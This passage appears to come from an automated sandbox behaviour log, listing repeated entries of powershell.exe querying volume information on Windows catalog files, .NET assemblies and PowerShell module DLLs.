                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
